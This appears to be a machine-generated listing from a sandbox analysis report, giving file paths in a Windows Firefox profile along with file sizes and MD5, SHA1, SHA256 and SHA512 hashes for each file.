C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878
Filesize13KB
MD56ea3863b1eb9946b5de9dc6d110dfabd
SHA105c38e078b3be2550b58a2c97ffba30ec58769d2
SHA256cef331d6508d20ef271a8a4388fbfb39e4b305d8210c49c9fe0d809cfd664dfd
SHA51233d4d375e020de5758d2eebfe7c6b227da493b4dc2c840a0a3604ba6625db81195c06f137c0a5a705bbb65ea79d6f36ef07d769790eb1baa8e024235e1cddb9b
-
Filesize
4.2MB
MD540cb4053a584486a21a109ffb44933c9
SHA107a94039a6176646ecdb0a5b0fab59b632bdbd18
SHA25671b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84
SHA51258356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3
-
Filesize
1.8MB
MD56380b8ca2f9bfc1d86617a3a7fd924f1
SHA104ff7e660a59bd2c45098e99a3fd5bff614d2d57
SHA256f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c
SHA5128b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033
-
Filesize
1.7MB
MD581380b3f4700458353f68405ba69f471
SHA12c51c11246200de63ac0121df7fc94545f0aef38
SHA2565b039e26817ac3dde3340af44180e943e7823936cb537342e8a818e5d8705908
SHA512a59cd918a59a2aef818e2974579026a1ab344bfe658e23954550b6c2d44df2285d5365cd60d4086c60d4234ed8616546826d9ed66634150f0d4fde8702e0ff3f
-
Filesize
901KB
MD57fa8aa5776c44304def2ed20c16d29ec
SHA10fc5106137c34600f7bbb963a6c73b3f4911f1a3
SHA25669a5b88b0132f61fcd531761b93e11ee2d8a53228431b295c6827f314fd47dbd
SHA5126eb521c820d034683a014f4fa998055c339114182512c3241330e5b8a43843b01c478cf8cb8d1e51b767c888da9fbcb8a7ee900287b1d359b7ead2ef6eeb2aa8
-
Filesize
2.7MB
MD5dd9ad82b68a13333652866431f0ee8d9
SHA123b45a0875b428204f4f3448442aae222274612f
SHA2568ba30fce56df7cd2c37d70dda3dbde19b2d5ff5c3896e791e484f2a1838fd106
SHA51235311c88fd3fa87f3ecbb4442c77d349673fcf8f7d6b68ba781efd1a95ef562a26dc3623437304f1b69bc128f8dce28656cf28a1e79d2ff0528d6c93def13ee7
-
Filesize
1.4MB
MD5e1cf72329542de8b3004517ee07d8371
SHA1c22ac1f279cc11dffd30a41863181da598231d4b
SHA256301e56052cf570110e66a429c0acc2454569ff5f966af0e809bef33eb2e02baa
SHA5127267aa2244edd22b4ceda89e8e188180bcc409320f77b0d9fc9fbb63c0906ab23dc9dff4bd5e02018aa08194cb8bb8dcd0b28ae1c44b2497a13bb21411ec6edc
-
Filesize
50KB
MD5666248c216a3f63828f739839230f9f6
SHA113690837235053762a538b4c5b2b601ec9f6bb22
SHA25600655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da
SHA51237e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD5873f4ff6922f79aca237323377183153
SHA1c0e782ab9058afb71626fae94fdd996cbeda934a
SHA256bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271
SHA5127fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8
-
Filesize
1.1MB
MD514c6fa8e50b4147075eb922bd0c8b28d
SHA10faad18b0e26ce3b5c364621a4f0aee9db56a9a7
SHA25690c4a61af494b63ecfe1226714175675a4e49e57d50718491b3bc8fe29dd8fc7
SHA512e6c35bbcaa9a8bb306e58bb91aadf5feed6b1ad1df6ee0e68bf3bae9b76d84c862b4ee9dd87a1d288fe1b7aaaac13467964436a09ec529f67af50905cd0ef876
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
2KB
MD582f229d0c36b68073da70ef5958e425d
SHA12beb8cd227b49b1d119165d6e3d258ddb730387a
SHA2560f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394
SHA5124553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
27KB
MD5238ec4d17050e1841e8e0171407c2260
SHA12c8c14b257641f1e1151c6303dabde01621314f2
SHA256163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA5123eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102
-
Filesize
2.6MB
MD5985fef2b6872a1a94726dc3b7f1439de
SHA1e221a5c4f2f222b665c932ab9b1f66189cee3315
SHA25678ef7eacffaba55e653195fe37846375aeb51b164d80ad312afda54163da0622
SHA51241678a3e117cb83e7b99a65a6d0dda86db57ac0441d84ca817d6e04fa3751d4035215e8cd50bcd86b7232d1c28620103264f3a677ac14513d1fa0d977ba94f39
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin
Filesize8KB
MD5714215fd87bac3e030097a442d025ba6
SHA1c933990925af60bdcbd37a37e9756eba44395b60
SHA256e695c4af363900aead26d0747b1566c858e124f584b16c086d931720cc3be706
SHA51219480306eed9ae7160294a292001b77334cc1265b7b35cd1c5032d485e30cfec1e53975aa2f5788aa76b98b8b2ed4e8c460b2e81fcaf5c3207f3ec8f9be55b8b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin
Filesize18KB
MD55f815b570a29b53d2682eee85a1497ab
SHA1dc40da769052e87172977a54329d6ee54dd8ed32
SHA2567e4523a6073b57de49713cf972a87732490992fba3ab3ede995ca82e1913a41c
SHA512a0b6fec40ca2982970733f5d5199f951a0d24a1353ab63bc478b225d35f42de88ff7ef84d340dab6e7a48889992cbb3e760db38bf8a015bc3dae8d22c3463c4b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD53840d9094e96845aa1ba2efb81d25dec
SHA1f3710a4959ddba2d095b437f7b78869b01a9cc2f
SHA256531e2d7d51a935bfe3245ddf18a860de957eebb276d5dfde1cfccd5f71be0c89
SHA51218ff7c7ae46b151945319c5ac80a0f0c8b6df78d7f2d914ea917d38082b2df61eef84cf43b9714d0552007cf0605d05cd2129b27dcd71ab08a4299de7914a802
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD52a48bbbd2aafdd26e3ec45eea2de5dbb
SHA13046ce7b47d62c62d449302d313adfb078a6038a
SHA25607c9d6d3ee8b2195cea137c2ec35784c069923cf46112e597ac4a86716ecf789
SHA5123f379695d2760cbb7f6aba110828941332d3f2679dab6b94ca0c64d151c314a7f9a0211dfbe4c269226cc9ff66c0a60fa7688c14894a551887759a9e0059fd19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD57967eb8f6fe4dd9b4034023054328dea
SHA13b1765b076eb05c018e716acc4cd7051f93d256d
SHA256f74a9e44d4a812cef90a26e17c6adbafb28334eca6aa1448b197465f0d79f7a9
SHA51229df4dace207f08cfe177581a5eb0c7f50621993181e9143dec021fcfc1b08d362ab3e06c695e4fe8373de02f60853a62dbc21291bdec9a10dfb2fa129f2e86e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\061c2301-7ca6-49a8-8b90-69a363704cf2
Filesize26KB
MD5db4df16bde9c8c140574d66ff899e361
SHA13cb31df60a458f27661f2c393a0bfba76784b98b
SHA2568863d0f50ac4a6f9c8512e285f8c73b8c4c7b088bd52ca0e1810478ee0475d1f
SHA512796f9691e0be2ab43e2f445152f6a285cc0e165b7c22d0fd16a93eae8d8ae62958e32509d5738179498a213c30773980769c8f45b6eb9f70fb23d88e1294ec54
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\0cb9fa0a-2b00-4496-8380-126d379e60c8
Filesize982B
MD5e961f46df82c56185393950b5a5faadd
SHA153796dd6d0829190543784a6edd22ce5518cf2d4
SHA256bf0df27f4276e56c62cbe4bd3f40ce9f3208486aad7f8ada2ebfa2dc7da2c729
SHA5126b13616a5e81504be198cb53a7f95afe1e24d7758ad5227d73453e094e46b541011595c7de34f78055baf8d28ce4b0d2c5b044b52f85d4c9c8185f6b7ac8e56a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\5f35dcaa-268e-4041-9e77-90df2398d9d2
Filesize671B
MD5541c362c7c2dfeb539e6c6b9046f0967
SHA192beb0ec1d403b727b589ddecb4fd1a42a17ff47
SHA25633c8d42a36fe82d6a80a68799862c9b8c41fc2af92dbdc421b5d675b82fea8bf
SHA512136cf16d7ac09702b327d2b95f0d8c89354f18142c4ed55a781d9538ec6b8dfa678afd1834ee76c3f9f3d92ebc08207a8731290024db1dfafd69772f714f50f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5643a8cd39d4da2301cabd25052b16181
SHA1f29755787815082502f4190c1ad5f75b5eff9675
SHA2563e4b06c353249127fb4b6929567411f2edcc381a2cce0b92000584d38f5820a9
SHA51243d55f9d350d8cf71b01edef6d31ff1dd2aca9f621013b06e422822cb0ea37214690a940aa3628552fa4aa3e724c3d41a1ddf510aa7a3f0866eefdc4a3d22ac6
-
Filesize
10KB
MD570d251951cda1197d364b4b84b3d7fb0
SHA12f8a958d1e8f922f19a53849fb3fa86c8ec1806b
SHA25688b7409c9908469ea6e31208c4f578d3ad585330480c7675d682f8e0b7ed6b19
SHA51248e3ce73eeae52231cca58a6edfa4cfffc618a198bf4a2ac415bbfb883bd0165eb42f284b562f616bd4c83ecf0d3713bae4068ce96a210cf7cea14a8551e2f06
-
Filesize
15KB
MD5c7e263201bdad5cd720ffbc9c2311f5f
SHA1643570fc8a30ba7642fda00a8f9110eca8ceaa3e
SHA256468aa9a63dc0f0a3712d64f8652b7c6c656831f8ea70653e84a748865282bf93
SHA5126f32d13f914825842cfc33a2d9af6e0c47ec17d5fc89a1b7d8d8bb63d3bd1f146808048c755adb23d83e99745cf7f2aae8d2b0db3786d8a267a94526724ba202
-
Filesize
10KB
MD5348bb60cfda6d09d295c9ba00fdcd54e
SHA1fd50e99e3d504f4fd8166f85f50d6d43afb8db4e
SHA256b44fa7ac1197697aa0e5973286d073c5b71dad8b3fbd427884d21cbb0fdfa0fc
SHA512aec3d190addf038f4aa9ada0bd53f7f010ef668de7b0d75b58e99b7c2d0ea1eb26ca5f4d16ee683a1ebd13a3a127410c3e67d94a385974311a2af755c01173fe